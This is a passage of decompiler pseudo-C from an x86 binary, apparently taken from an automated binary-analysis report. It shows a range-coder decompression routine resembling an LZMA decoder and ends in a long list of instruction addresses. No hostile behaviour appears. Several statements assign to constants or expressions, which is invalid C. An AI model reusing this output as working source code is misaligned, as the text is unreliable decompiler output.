                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							__eax =  *(__ebp - 0x2c);
                                                              							goto L101;
                                                              						case 0xd:
                                                              							L37:
                                                              							__eflags =  *(__ebp - 0x6c);
                                                              							if( *(__ebp - 0x6c) == 0) {
                                                              								 *(__ebp - 0x88) = 0xd;
                                                              								goto L170;
                                                              							}
                                                              							__ecx =  *(__ebp - 0x70);
                                                              							__eax =  *(__ebp - 0xc);
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							_t122 = __ebp - 0x70;
                                                              							 *_t122 =  *(__ebp - 0x70) + 1;
                                                              							__eflags =  *_t122;
                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							L39:
                                                              							__eax =  *(__ebp - 0x40);
                                                              							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                              								goto L48;
                                                              							}
                                                              							__eflags = __ebx - 0x100;
                                                              							if(__ebx >= 0x100) {
                                                              								goto L54;
                                                              							}
                                                              							L41:
                                                              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                              							__ecx =  *(__ebp - 0x58);
                                                              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                              							 *(__ebp - 0x48) = __eax;
                                                              							__eax = __eax + 1;
                                                              							__eax = __eax << 8;
                                                              							__eax = __eax + __ebx;
                                                              							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              							__ax =  *__esi;
                                                              							 *(__ebp - 0x54) = __esi;
                                                              							__edx = __ax & 0x0000ffff;
                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              								__cx = __ax;
                                                              								 *(__ebp - 0x40) = 1;
                                                              								__cx = __ax >> 5;
                                                              								__eflags = __eax;
                                                              								__ebx = __ebx + __ebx + 1;
                                                              								 *__esi = __ax;
                                                              							} else {
                                                              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                              								 *(__ebp - 0x10) = __ecx;
                                                              								0x800 = 0x800 - __edx;
                                                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                              								__ebx = __ebx + __ebx;
                                                              								 *__esi = __cx;
                                                              							}
                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              							 *(__ebp - 0x44) = __ebx;
                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                              								goto L39;
                                                              							} else {
                                                              								goto L37;
                                                              							}
                                                              						case 0xe:
                                                              							L46:
                                                              							__eflags =  *(__ebp - 0x6c);
                                                              							if( *(__ebp - 0x6c) == 0) {
                                                              								 *(__ebp - 0x88) = 0xe;
                                                              								goto L170;
                                                              							}
                                                              							__ecx =  *(__ebp - 0x70);
                                                              							__eax =  *(__ebp - 0xc);
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							_t156 = __ebp - 0x70;
                                                              							 *_t156 =  *(__ebp - 0x70) + 1;
                                                              							__eflags =  *_t156;
                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							while(1) {
                                                              								L48:
                                                              								__eflags = __ebx - 0x100;
                                                              								if(__ebx >= 0x100) {
                                                              									break;
                                                              								}
                                                              								__eax =  *(__ebp - 0x58);
                                                              								__edx = __ebx + __ebx;
                                                              								__ecx =  *(__ebp - 0x10);
                                                              								__esi = __edx + __eax;
                                                              								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              								__ax =  *__esi;
                                                              								 *(__ebp - 0x54) = __esi;
                                                              								__edi = __ax & 0x0000ffff;
                                                              								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              								__eflags =  *(__ebp - 0xc) - __ecx;
                                                              								if( *(__ebp - 0xc) >= __ecx) {
                                                              									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              									__cx = __ax;
                                                              									_t170 = __edx + 1; // 0x1
                                                              									__ebx = _t170;
                                                              									__cx = __ax >> 5;
                                                              									__eflags = __eax;
                                                              									 *__esi = __ax;
                                                              								} else {
                                                              									 *(__ebp - 0x10) = __ecx;
                                                              									0x800 = 0x800 - __edi;
                                                              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              									__ebx = __ebx + __ebx;
                                                              									 *__esi = __cx;
                                                              								}
                                                              								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              								 *(__ebp - 0x44) = __ebx;
                                                              								if( *(__ebp - 0x10) >= 0x1000000) {
                                                              									continue;
                                                              								} else {
                                                              									goto L46;
                                                              								}
                                                              							}
                                                              							L54:
                                                              							_t173 = __ebp - 0x34;
                                                              							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                              							__eflags =  *_t173;
                                                              							goto L55;
                                                              						case 0xf:
                                                              							L58:
                                                              							__eflags =  *(__ebp - 0x6c);
                                                              							if( *(__ebp - 0x6c) == 0) {
                                                              								 *(__ebp - 0x88) = 0xf;
                                                              								goto L170;
                                                              							}
                                                              							__ecx =  *(__ebp - 0x70);
                                                              							__eax =  *(__ebp - 0xc);
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							_t203 = __ebp - 0x70;
                                                              							 *_t203 =  *(__ebp - 0x70) + 1;
                                                              							__eflags =  *_t203;
                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							L60:
                                                              							__eflags = __ebx - 0x100;
                                                              							if(__ebx >= 0x100) {
                                                              								L55:
                                                              								__al =  *(__ebp - 0x44);
                                                              								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                              								goto L56;
                                                              							}
                                                              							L61:
                                                              							__eax =  *(__ebp - 0x58);
                                                              							__edx = __ebx + __ebx;
                                                              							__ecx =  *(__ebp - 0x10);
                                                              							__esi = __edx + __eax;
                                                              							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              							__ax =  *__esi;
                                                              							 *(__ebp - 0x54) = __esi;
                                                              							__edi = __ax & 0x0000ffff;
                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              								__cx = __ax;
                                                              								_t217 = __edx + 1; // 0x1
                                                              								__ebx = _t217;
                                                              								__cx = __ax >> 5;
                                                              								__eflags = __eax;
                                                              								 *__esi = __ax;
                                                              							} else {
                                                              								 *(__ebp - 0x10) = __ecx;
                                                              								0x800 = 0x800 - __edi;
                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              								__ebx = __ebx + __ebx;
                                                              								 *__esi = __cx;
                                                              							}
                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              							 *(__ebp - 0x44) = __ebx;
                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                              								goto L60;
                                                              							} else {
                                                              								goto L58;
                                                              							}
                                                              						case 0x10:
                                                              							L109:
                                                              							__eflags =  *(__ebp - 0x6c);
                                                              							if( *(__ebp - 0x6c) == 0) {
                                                              								 *(__ebp - 0x88) = 0x10;
                                                              								goto L170;
                                                              							}
                                                              							__ecx =  *(__ebp - 0x70);
                                                              							__eax =  *(__ebp - 0xc);
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							_t365 = __ebp - 0x70;
                                                              							 *_t365 =  *(__ebp - 0x70) + 1;
                                                              							__eflags =  *_t365;
                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							goto L111;
                                                              						case 0x11:
                                                              							goto L69;
                                                              						case 0x12:
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								__eax =  *(__ebp - 0x58);
                                                              								 *(__ebp - 0x84) = 0x13;
                                                              								__esi =  *(__ebp - 0x58) + 2;
                                                              								goto L132;
                                                              							}
                                                              							__eax =  *(__ebp - 0x4c);
                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                              							__ecx =  *(__ebp - 0x58);
                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                              							__eflags = __eax;
                                                              							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                              							goto L130;
                                                              						case 0x13:
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								_t469 = __ebp - 0x58;
                                                              								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                              								__eflags =  *_t469;
                                                              								 *(__ebp - 0x30) = 0x10;
                                                              								 *(__ebp - 0x40) = 8;
                                                              								L144:
                                                              								 *(__ebp - 0x7c) = 0x14;
                                                              								goto L145;
                                                              							}
                                                              							__eax =  *(__ebp - 0x4c);
                                                              							__ecx =  *(__ebp - 0x58);
                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                              							 *(__ebp - 0x30) = 8;
                                                              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                              							L130:
                                                              							 *(__ebp - 0x58) = __eax;
                                                              							 *(__ebp - 0x40) = 3;
                                                              							goto L144;
                                                              						case 0x14:
                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                              							__eax =  *(__ebp - 0x80);
                                                              							goto L140;
                                                              						case 0x15:
                                                              							__eax = 0;
                                                              							__eflags =  *(__ebp - 0x38) - 7;
                                                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              							__al = __al & 0x000000fd;
                                                              							__eax = (__eflags >= 0) - 1 + 0xb;
                                                              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                              							goto L120;
                                                              						case 0x16:
                                                              							__eax =  *(__ebp - 0x30);
                                                              							__eflags = __eax - 4;
                                                              							if(__eax >= 4) {
                                                              								_push(3);
                                                              								_pop(__eax);
                                                              							}
                                                              							__ecx =  *(__ebp - 4);
                                                              							 *(__ebp - 0x40) = 6;
                                                              							__eax = __eax << 7;
                                                              							 *(__ebp - 0x7c) = 0x19;
                                                              							 *(__ebp - 0x58) = __eax;
                                                              							goto L145;
                                                              						case 0x17:
                                                              							L145:
                                                              							__eax =  *(__ebp - 0x40);
                                                              							 *(__ebp - 0x50) = 1;
                                                              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                              							goto L149;
                                                              						case 0x18:
                                                              							L146:
                                                              							__eflags =  *(__ebp - 0x6c);
                                                              							if( *(__ebp - 0x6c) == 0) {
                                                              								 *(__ebp - 0x88) = 0x18;
                                                              								goto L170;
                                                              							}
                                                              							__ecx =  *(__ebp - 0x70);
                                                              							__eax =  *(__ebp - 0xc);
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							_t484 = __ebp - 0x70;
                                                              							 *_t484 =  *(__ebp - 0x70) + 1;
                                                              							__eflags =  *_t484;
                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							L148:
                                                              							_t487 = __ebp - 0x48;
                                                              							 *_t487 =  *(__ebp - 0x48) - 1;
                                                              							__eflags =  *_t487;
                                                              							L149:
                                                              							__eflags =  *(__ebp - 0x48);
                                                              							if( *(__ebp - 0x48) <= 0) {
                                                              								__ecx =  *(__ebp - 0x40);
                                                              								__ebx =  *(__ebp - 0x50);
                                                              								0 = 1;
                                                              								__eax = 1 << __cl;
                                                              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                              								__eax =  *(__ebp - 0x7c);
                                                              								 *(__ebp - 0x44) = __ebx;
                                                              								goto L140;
                                                              							}
                                                              							__eax =  *(__ebp - 0x50);
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              							__eax =  *(__ebp - 0x58);
                                                              							__esi = __edx + __eax;
                                                              							 *(__ebp - 0x54) = __esi;
                                                              							__ax =  *__esi;
                                                              							__edi = __ax & 0x0000ffff;
                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              								__cx = __ax;
                                                              								__cx = __ax >> 5;
                                                              								__eax = __eax - __ecx;
                                                              								__edx = __edx + 1;
                                                              								__eflags = __edx;
                                                              								 *__esi = __ax;
                                                              								 *(__ebp - 0x50) = __edx;
                                                              							} else {
                                                              								 *(__ebp - 0x10) = __ecx;
                                                              								0x800 = 0x800 - __edi;
                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              								 *__esi = __cx;
                                                              							}
                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                              								goto L148;
                                                              							} else {
                                                              								goto L146;
                                                              							}
                                                              						case 0x19:
                                                              							__eflags = __ebx - 4;
                                                              							if(__ebx < 4) {
                                                              								 *(__ebp - 0x2c) = __ebx;
                                                              								L119:
                                                              								_t393 = __ebp - 0x2c;
                                                              								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                              								__eflags =  *_t393;
                                                              								L120:
                                                              								__eax =  *(__ebp - 0x2c);
                                                              								__eflags = __eax;
                                                              								if(__eax == 0) {
                                                              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                              									goto L170;
                                                              								}
                                                              								__eflags = __eax -  *(__ebp - 0x60);
                                                              								if(__eax >  *(__ebp - 0x60)) {
                                                              									goto L171;
                                                              								}
                                                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                              								__eax =  *(__ebp - 0x30);
                                                              								_t400 = __ebp - 0x60;
                                                              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                              								__eflags =  *_t400;
                                                              								goto L123;
                                                              							}
                                                              							__ecx = __ebx;
                                                              							__eax = __ebx;
                                                              							__ecx = __ebx >> 1;
                                                              							__eax = __ebx & 0x00000001;
                                                              							__ecx = (__ebx >> 1) - 1;
                                                              							__al = __al | 0x00000002;
                                                              							__eax = (__ebx & 0x00000001) << __cl;
                                                              							__eflags = __ebx - 0xe;
                                                              							 *(__ebp - 0x2c) = __eax;
                                                              							if(__ebx >= 0xe) {
                                                              								__ebx = 0;
                                                              								 *(__ebp - 0x48) = __ecx;
                                                              								L102:
                                                              								__eflags =  *(__ebp - 0x48);
                                                              								if( *(__ebp - 0x48) <= 0) {
                                                              									__eax = __eax + __ebx;
                                                              									 *(__ebp - 0x40) = 4;
                                                              									 *(__ebp - 0x2c) = __eax;
                                                              									__eax =  *(__ebp - 4);
                                                              									__eax =  *(__ebp - 4) + 0x644;
                                                              									__eflags = __eax;
                                                              									L108:
                                                              									__ebx = 0;
                                                              									 *(__ebp - 0x58) = __eax;
                                                              									 *(__ebp - 0x50) = 1;
                                                              									 *(__ebp - 0x44) = 0;
                                                              									 *(__ebp - 0x48) = 0;
                                                              									L112:
                                                              									__eax =  *(__ebp - 0x40);
                                                              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                              										_t391 = __ebp - 0x2c;
                                                              										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                              										__eflags =  *_t391;
                                                              										goto L119;
                                                              									}
                                                              									__eax =  *(__ebp - 0x50);
                                                              									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              									__eax =  *(__ebp - 0x58);
                                                              									__esi = __edi + __eax;
                                                              									 *(__ebp - 0x54) = __esi;
                                                              									__ax =  *__esi;
                                                              									__ecx = __ax & 0x0000ffff;
                                                              									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                              									__eflags =  *(__ebp - 0xc) - __edx;
                                                              									if( *(__ebp - 0xc) >= __edx) {
                                                              										__ecx = 0;
                                                              										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                              										__ecx = 1;
                                                              										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                              										__ebx = 1;
                                                              										__ecx =  *(__ebp - 0x48);
                                                              										__ebx = 1 << __cl;
                                                              										__ecx = 1 << __cl;
                                                              										__ebx =  *(__ebp - 0x44);
                                                              										__ebx =  *(__ebp - 0x44) | __ecx;
                                                              										__cx = __ax;
                                                              										__cx = __ax >> 5;
                                                              										__eax = __eax - __ecx;
                                                              										__edi = __edi + 1;
                                                              										__eflags = __edi;
                                                              										 *(__ebp - 0x44) = __ebx;
                                                              										 *__esi = __ax;
                                                              										 *(__ebp - 0x50) = __edi;
                                                              									} else {
                                                              										 *(__ebp - 0x10) = __edx;
                                                              										0x800 = 0x800 - __ecx;
                                                              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                              										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              										 *__esi = __dx;
                                                              									}
                                                              									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              									if( *(__ebp - 0x10) >= 0x1000000) {
                                                              										L111:
                                                              										_t368 = __ebp - 0x48;
                                                              										 *_t368 =  *(__ebp - 0x48) + 1;
                                                              										__eflags =  *_t368;
                                                              										goto L112;
                                                              									} else {
                                                              										goto L109;
                                                              									}
                                                              								}
                                                              								__ecx =  *(__ebp - 0xc);
                                                              								__ebx = __ebx + __ebx;
                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                              								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              								 *(__ebp - 0x44) = __ebx;
                                                              								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                              									__ecx =  *(__ebp - 0x10);
                                                              									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              									__ebx = __ebx | 0x00000001;
                                                              									__eflags = __ebx;
                                                              									 *(__ebp - 0x44) = __ebx;
                                                              								}
                                                              								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              								if( *(__ebp - 0x10) >= 0x1000000) {
                                                              									L101:
                                                              									_t338 = __ebp - 0x48;
                                                              									 *_t338 =  *(__ebp - 0x48) - 1;
                                                              									__eflags =  *_t338;
                                                              									goto L102;
                                                              								} else {
                                                              									goto L99;
                                                              								}
                                                              							}
                                                              							__edx =  *(__ebp - 4);
                                                              							__eax = __eax - __ebx;
                                                              							 *(__ebp - 0x40) = __ecx;
                                                              							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                              							goto L108;
                                                              						case 0x1a:
                                                              							L56:
                                                              							__eflags =  *(__ebp - 0x64);
                                                              							if( *(__ebp - 0x64) == 0) {
                                                              								 *(__ebp - 0x88) = 0x1a;
                                                              								goto L170;
                                                              							}
                                                              							__ecx =  *(__ebp - 0x68);
                                                              							__al =  *(__ebp - 0x5c);
                                                              							__edx =  *(__ebp - 8);
                                                              							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              							 *( *(__ebp - 0x68)) = __al;
                                                              							__ecx =  *(__ebp - 0x14);
                                                              							 *(__ecx +  *(__ebp - 8)) = __al;
                                                              							__eax = __ecx + 1;
                                                              							__edx = 0;
                                                              							_t192 = __eax %  *(__ebp - 0x74);
                                                              							__eax = __eax /  *(__ebp - 0x74);
                                                              							__edx = _t192;
                                                              							goto L79;
                                                              						case 0x1b:
                                                              							goto L75;
                                                              						case 0x1c:
                                                              							while(1) {
                                                              								L123:
                                                              								__eflags =  *(__ebp - 0x64);
                                                              								if( *(__ebp - 0x64) == 0) {
                                                              									break;
                                                              								}
                                                              								__eax =  *(__ebp - 0x14);
                                                              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              								__eflags = __eax -  *(__ebp - 0x74);
                                                              								if(__eax >=  *(__ebp - 0x74)) {
                                                              									__eax = __eax +  *(__ebp - 0x74);
                                                              									__eflags = __eax;
                                                              								}
                                                              								__edx =  *(__ebp - 8);
                                                              								__cl =  *(__eax + __edx);
                                                              								__eax =  *(__ebp - 0x14);
                                                              								 *(__ebp - 0x5c) = __cl;
                                                              								 *(__eax + __edx) = __cl;
                                                              								__eax = __eax + 1;
                                                              								__edx = 0;
                                                              								_t414 = __eax %  *(__ebp - 0x74);
                                                              								__eax = __eax /  *(__ebp - 0x74);
                                                              								__edx = _t414;
                                                              								__eax =  *(__ebp - 0x68);
                                                              								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                              								__eflags =  *(__ebp - 0x30);
                                                              								 *( *(__ebp - 0x68)) = __cl;
                                                              								 *(__ebp - 0x14) = _t414;
                                                              								if( *(__ebp - 0x30) > 0) {
                                                              									continue;
                                                              								} else {
                                                              									goto L80;
                                                              								}
                                                              							}
                                                              							 *(__ebp - 0x88) = 0x1c;
                                                              							goto L170;
                                                              					}
                                                              				}
                                                              			}













                                                              0x00000000
                                                              0x004070ab
                                                              0x004070ab
                                                              0x004070af
                                                              0x00407166
                                                              0x00407169
                                                              0x00407175
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00407441
                                                              0x00407441
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x0040741c
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x00000000
                                                              0x004075cf
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00000000
                                                              0x0040743e
                                                              0x004070b5
                                                              0x004070b9
                                                              0x004075fa
                                                              0x004075fa
                                                              0x004075fd
                                                              0x00407601
                                                              0x00407601
                                                              0x004070bf
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x004075e5
                                                              0x004075ed
                                                              0x004075f4
                                                              0x004075f6
                                                              0x00000000
                                                              0x004075f6
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x0040710d
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c5c
                                                              0x00406c84
                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d61
                                                              0x00406d64
                                                              0x00406dd5
                                                              0x00406dd8
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x00000000
                                                              0x00406dec
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d6d
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d87
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406d9c
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406dac
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00000000
                                                              0x00406db1
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406db7
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
